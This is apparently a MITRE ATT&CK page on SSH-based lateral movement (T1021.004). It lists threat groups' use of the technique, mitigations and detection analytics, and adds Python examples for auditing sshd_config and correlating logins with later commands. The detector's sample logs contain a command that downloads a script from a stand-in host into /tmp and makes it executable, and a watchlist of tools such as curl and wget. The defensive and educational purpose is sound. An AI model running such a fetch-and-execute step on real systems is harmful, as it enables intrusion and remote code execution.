Remote Services: SSH

Adversaries may use Valid Accounts to log into remote machines using Secure Shell (SSH). The adversary may then perform actions as the logged-on user.

SSH is a protocol that allows authorized users to open remote shells on other computers. Many Linux and macOS versions come with SSH installed by default, although it is typically disabled until the user enables it. On ESXi, SSH can be enabled either directly on the host (e.g., via vim-cmd hostsvc/enable_ssh) or via vCenter.[1][2][3] The SSH server can be configured to use standard password authentication or public-private keypairs in lieu of or in addition to a password. In the keypair scenario, the user’s public key must be in a special file on the computer running the server that lists which keypairs are allowed to log in as that user (i.e., SSH Authorized Keys).

ID: T1021.004
Sub-technique of: T1021
Platforms: ESXi, Linux, macOS
Contributors: Janantha Marasinghe
Version: 1.3
Created: 11 February 2020
Last Modified: 24 October 2025

Procedure Examples

ID Name Description
G0087 APT39

APT39 used secure shell (SSH) to move laterally among their targets.[4]

G1023 APT5

APT5 has used SSH for lateral movement in compromised environments including for enabling access to ESXi host servers.[5]

G0143 Aquatic Panda

Aquatic Panda used SSH with captured user credentials to move laterally in victim environments.[6]

G0098 BlackTech

BlackTech has used PuTTY for remote access.[7]

C0032 C0032

During the C0032 campaign, TEMP.Veles relied on encrypted SSH-based tunnels to transfer tools and for remote command/program execution.[8]

S0154 Cobalt Strike

Cobalt Strike can SSH to a remote service.[9][10]

C0029 Cutting Edge

During Cutting Edge, threat actors used SSH for lateral movement.[11]

S0363 Empire

Empire contains modules for executing commands over SSH as well as in-memory VNC agent injection.[12]

G1016 FIN13

FIN13 has remotely accessed compromised environments via secure shell (SSH) for lateral movement.[13]

G0046 FIN7

FIN7 has used SSH to move laterally through victim environments.[14]

G0117 Fox Kitten

Fox Kitten has used the PuTTY and Plink tools for lateral movement.[15]

G0036 GCMAN

GCMAN uses PuTTY for lateral movement.[16]

G0119 Indrik Spider

Indrik Spider has used SSH for lateral movement.[17]

S0599 Kinsing

Kinsing has used SSH for lateral movement.[18]

G0032 Lazarus Group

Lazarus Group used SSH and the PuTTY PSCP utility to gain access to a restricted segment of a compromised network.[19]

G0065 Leviathan

Leviathan used SSH for internal reconnaissance.[20]

C0049 Leviathan Australian Intrusions

Leviathan used SSH brute force techniques to move laterally within victim environments during Leviathan Australian Intrusions.[21]

G0045 menuPass

menuPass has used PuTTY Secure Copy Client (PSCP) to transfer data.[22]

G0049 OilRig

OilRig has used PuTTY to access compromised systems.[23]

S1187 reGeorg

reGeorg can communicate using SSH through an HTTP tunnel.[24]

G0106 Rocke

Rocke has spread its coinminer via SSH.[25]

G1045 Salt Typhoon

Salt Typhoon has modified the loopback address on compromised switches and used them as the source of SSH connections to additional devices within the target environment, allowing them to bypass access control lists (ACLs).[26]

G1015 Scattered Spider

Scattered Spider has used SSH to move laterally in victim environments and to access the vSphere vCenter Server GUI.[27][28]

G1046 Storm-1811

Storm-1811 has used OpenSSH to establish an SSH tunnel to victims for persistent access.[29]

G0139 TeamTNT

TeamTNT has used SSH to connect back to victim machines.[30] TeamTNT has also used SSH to transfer tools and payloads onto victim hosts and execute them.[31]

G1048 UNC3886

UNC3886 has established remote SSH access to targeted ESXi hosts.[32][33]

Mitigations

ID Mitigation Description
M1042 Disable or Remove Feature or Program

Disable the SSH daemon on systems that do not require it, especially ESXi servers. For macOS, ensure Remote Login is disabled under Sharing Preferences.[34]

M1032 Multi-factor Authentication

Require multi-factor authentication for SSH connections wherever possible, such as password-protected SSH keys.

M1018 User Account Management

Limit which user accounts are allowed to log in via SSH.
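The M1018 and M1032 mitigations above both reduce to sshd_config directives. The following is an added example (not from the ATT&CK page) that audits a config text for those settings; the directive names are real OpenSSH keywords, while the WEAK and HARDENED sample configs are constructed.

```python
# Added example (not from the ATT&CK page): audit an sshd_config against the
# M1018 / M1032 mitigations above. Directive names are real OpenSSH keywords;
# the WEAK and HARDENED samples are constructed.
import re

def parse_sshd_config(text):
    """Map lowercased directive -> first value seen (sshd uses the first
    occurrence); conditional Match blocks are out of scope for this check."""
    conf = {}
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        if line.lower().startswith("match "):
            break
        parts = re.split(r"\s*=\s*|\s+", line, maxsplit=1)
        if len(parts) == 2:
            conf.setdefault(parts[0].lower(), parts[1].strip())
    return conf

def audit_sshd_config(text):
    """Return findings tagged with the mitigation ID each one relates to."""
    c = parse_sshd_config(text)
    findings = []
    # M1018: limit which accounts may log in over SSH
    if "allowusers" not in c and "allowgroups" not in c:
        findings.append("M1018: no AllowUsers/AllowGroups; every local account may try to log in")
    if c.get("permitrootlogin", "prohibit-password") == "yes":
        findings.append("M1018: PermitRootLogin yes permits direct root password logins")
    # M1032: a single factor must not be enough
    if c.get("passwordauthentication", "yes") == "yes":
        findings.append("M1032: PasswordAuthentication yes; password-only logins are accepted")
    # AuthenticationMethods lists alternatives separated by spaces; each
    # alternative is a comma-joined chain whose methods must all succeed.
    methods = c.get("authenticationmethods", "any")
    if any("," not in alt for alt in methods.split()):
        findings.append("M1032: AuthenticationMethods allows a single-method login")
    return findings

WEAK = """
PermitRootLogin yes
PasswordAuthentication yes
"""
HARDENED = """
PermitRootLogin no
PasswordAuthentication no
AllowGroups ssh-admins
AuthenticationMethods publickey,keyboard-interactive
"""
```

Running the audit on a live host's /etc/ssh/sshd_config gives an empty list only when both a login allow-list and a two-method authentication chain are configured.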

Detection Strategy

ID Name Analytic ID Analytic Description
DET0596 Behavioral Detection of Remote SSH Logins Followed by Post-Login Execution

AN1638

SSH login from a remote system (via sshd), followed by user-context execution of suspicious binaries or privilege-escalation behavior.

AN1639

SSH login detected via Unified Logs, followed by unusual process execution, especially outside normal user behavior patterns.

AN1640

SSH login via hostd or /var/log/auth.log, followed by CLI access to host shell or file manipulation in restricted areas.
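The analytics above share one shape: an accepted SSH login, then execution by the same user shortly afterwards. The following is an added example (not from the ATT&CK page) of that correlation for the sshd case (AN1638); the auth.log lines and the "EXEC" process records are constructed, and the watchlist and ten-minute window are assumptions.

```python
# Added example (not from the ATT&CK page): correlation rule in the shape of
# DET0596 / AN1638. It pairs sshd "Accepted" lines from /var/log/auth.log with
# later command executions by the same user and alerts when a watchlisted
# command runs within WINDOW of the login. Log lines are constructed; the
# watchlist and window are assumptions, not values from the page.
import re
from datetime import datetime, timedelta

AUTH_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ [\d:]+) \S+ sshd\[\d+\]: Accepted (?P<method>\w+) "
    r"for (?P<user>\S+) from (?P<src>[\d.]+) port \d+")
# Constructed exec records (e.g. normalised from auditd EXECVE or an EDR agent):
# "<timestamp> EXEC user=<name> cmd=<command line>"
EXEC_RE = re.compile(r"^(?P<ts>\w{3}\s+\d+ [\d:]+) EXEC user=(?P<user>\S+) cmd=(?P<cmd>.+)$")

WATCHLIST = ("curl ", "wget ", "chmod +x", "sudo ", "/tmp/", "useradd", "esxcli")
WINDOW = timedelta(minutes=10)

def _ts(s, year=2025):
    # syslog timestamps carry no year; the year is assumed for the sample
    return datetime.strptime(f"{year} {s}", "%Y %b %d %H:%M:%S")

def correlate(lines):
    """Return (login user, source IP, command) for each watchlisted command
    executed by a user within WINDOW after that user's SSH login."""
    logins, alerts = [], []
    for line in lines:
        m = AUTH_RE.match(line)
        if m:
            logins.append((_ts(m["ts"]), m["user"], m["src"]))
            continue
        e = EXEC_RE.match(line)
        if not e:
            continue
        t = _ts(e["ts"])
        for lt, user, src in logins:
            if user == e["user"] and timedelta(0) <= t - lt <= WINDOW \
                    and any(w in e["cmd"] for w in WATCHLIST):
                alerts.append((user, src, e["cmd"]))
                break
    return alerts

SAMPLE = [  # constructed log lines
    "Mar  3 10:01:02 web01 sshd[2211]: Accepted publickey for deploy from 10.0.0.5 port 51234 ssh2",
    "Mar  3 10:01:30 EXEC user=deploy cmd=git pull origin main",
    "Mar  3 10:02:15 web01 sshd[2290]: Accepted password for backup from 203.0.113.9 port 40022 ssh2",
    "Mar  3 10:03:00 EXEC user=backup cmd=curl -s http://203.0.113.9/x.sh -o /tmp/x.sh",
    "Mar  3 10:03:05 EXEC user=backup cmd=chmod +x /tmp/x.sh",
    "Mar  3 11:30:00 EXEC user=deploy cmd=sudo systemctl restart nginx",
]
```

The same loop serves AN1640 by swapping AUTH_RE for the hostd login format and extending the watchlist with host-shell commands; the deploy user's sudo at 11:30 falls outside the window and is not alerted on.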

References

  1. Zhongyuan Hau (Aaron), Ren Jie Yow, and Yoav Mazor. (2025, January 21). ESXi Ransomware Attacks: Stealthy Persistence through. Retrieved March 27, 2025.
  2. Junestherry Dela Cruz. (2022, January 24). Analysis and Impact of LockBit Ransomware’s First Linux and VMware ESXi Variant. Retrieved March 26, 2025.
  3. Abigail See, Zhongyuan (Aaron) Hau, Ren Jie Yow, Yoav Mazor, Omer Kidron, and Oren Biderman. (2025, February 4). The Anatomy of Abyss Locker Ransomware Attack. Retrieved April 4, 2025.
  4. Hawley et al. (2019, January 29). APT39: An Iranian Cyber Espionage Group Focused on Personal Information. Retrieved February 19, 2019.
  5. Perez, D. et al. (2021, May 27). Re-Checking Your Pulse: Updates on Chinese APT Actors Compromising Pulse Secure VPN Devices. Retrieved February 5, 2024.
  6. CrowdStrike. (2023). 2022 Falcon OverWatch Threat Hunting Report. Retrieved May 20, 2024.
  7. Threat Intelligence. (2020, September 29). Palmerworm: Espionage Gang Targets the Media, Finance, and Other Sectors. Retrieved March 25, 2022.
  8. Miller, S, et al. (2019, April 10). TRITON Actor TTP Profile, Custom Attack Tools, Detections, and ATT&CK Mapping. Retrieved April 16, 2019.
  9. Cobalt Strike. (2017, December 8). Tactics, Techniques, and Procedures. Retrieved November 17, 2024.
  10. Strategic Cyber LLC. (2020, November 5). Cobalt Strike: Advanced Threat Tactics for Penetration Testers. Retrieved April 13, 2021.
  11. Meltzer, M. et al. (2024, January 10). Active Exploitation of Two Zero-Day Vulnerabilities in Ivanti Connect Secure VPN. Retrieved February 27, 2024.
  12. Schroeder, W., Warner, J., Nelson, M. (n.d.). GitHub PowerShellEmpire. Retrieved April 28, 2016.
  13. Ta, V., et al. (2022, August 8). FIN13: A Cybercriminal Threat Actor Focused on Mexico. Retrieved February 9, 2023.
  14. Loui, E. and Reynolds, J. (2021, August 30). CARBON SPIDER Embraces Big Game Hunting, Part 1. Retrieved September 20, 2021.
  15. CISA. (2020, September 15). Iran-Based Threat Actor Exploits VPN Vulnerabilities. Retrieved December 21, 2020.
  16. Kaspersky Lab's Global Research & Analysis Team. (2016, February 8). APT-style bank robberies increase with Metel, GCMAN and Carbanak 2.0 attacks. Retrieved April 20, 2016.
  17. Mandiant Intelligence. (2022, June 2). To HADES and Back: UNC2165 Shifts to LOCKBIT to Evade Sanctions. Retrieved July 29, 2024.
  18. Singer, G. (2020, April 3). Threat Alert: Kinsing Malware Attacks Targeting Container Environments. Retrieved April 1, 2021.
  19. Vyacheslav Kopeytsev and Seongsu Park. (2021, February 25). Lazarus targets defense industry with ThreatNeedle. Retrieved October 27, 2021.
  20. Plan, F., et al. (2019, March 4). APT40: Examining a China-Nexus Espionage Actor. Retrieved March 18, 2019.
  21. CISA et al. (2024, July 8). People’s Republic of China (PRC) Ministry of State Security APT40 Tradecraft in Action. Retrieved February 3, 2025.
  22. PwC and BAE Systems. (2017, April). Operation Cloud Hopper. Retrieved April 5, 2017.
  23. Unit42. (2016, May 1). Evasive Serpens Unit 42 Playbook Viewer. Retrieved February 6, 2023.
  24. FortiGuard Labs. (2019, March 12). ReGeorg.HTTP.Tunnel. Retrieved December 3, 2024.
  25. Anomali Labs. (2019, March 15). Rocke Evolves Its Arsenal With a New Malware Family Written in Golang. Retrieved April 24, 2019.
  26. Cisco Talos. (2025, February 20). Weathering the storm: In the midst of a Typhoon. Retrieved February 24, 2025.
  27. Mandiant Incident Response. (2025, May 6). Defending Against UNC3944: Cybercrime Hardening Guidance from the Frontlines. Retrieved October 13, 2025.
  28. Mandiant Incident Response. (2025, July 23). From Help Desk to Hypervisor: Defending Your VMware vSphere Estate from UNC3944. Retrieved October 13, 2025.
  29. Microsoft Threat Intelligence. (2024, May 15). Threat actors misusing Quick Assist in social engineering attacks leading to ransomware. Retrieved March 14, 2025.
  30. Fishbein, N. (2020, September 8). Attackers Abusing Legitimate Cloud Monitoring Tools to Conduct Cyber Attacks. Retrieved September 22, 2021.
  31. Darin Smith. (2022, April 21). TeamTNT targeting AWS, Alibaba. Retrieved August 4, 2022.
  32. Alexander Marvi, Brad Slaybaugh, Ron Craft, and Rufus Brown. (2023, June 13). VMware ESXi Zero-Day Used by Chinese Espionage Actor to Perform Privileged Guest Operations on Compromised Hypervisors. Retrieved March 26, 2025.
  33. Marvi, A. et al. (2023, March 16). Fortinet Zero-Day and Custom Malware Used by Suspected Chinese Actor in Espionage Operation. Retrieved March 22, 2023.
  34. Sarah Edwards. (2020, April 30). Analysis of Apple Unified Logs: Quarantine Edition [Entry 6] – Working From Home? Remote Logins. Retrieved August 19, 2021.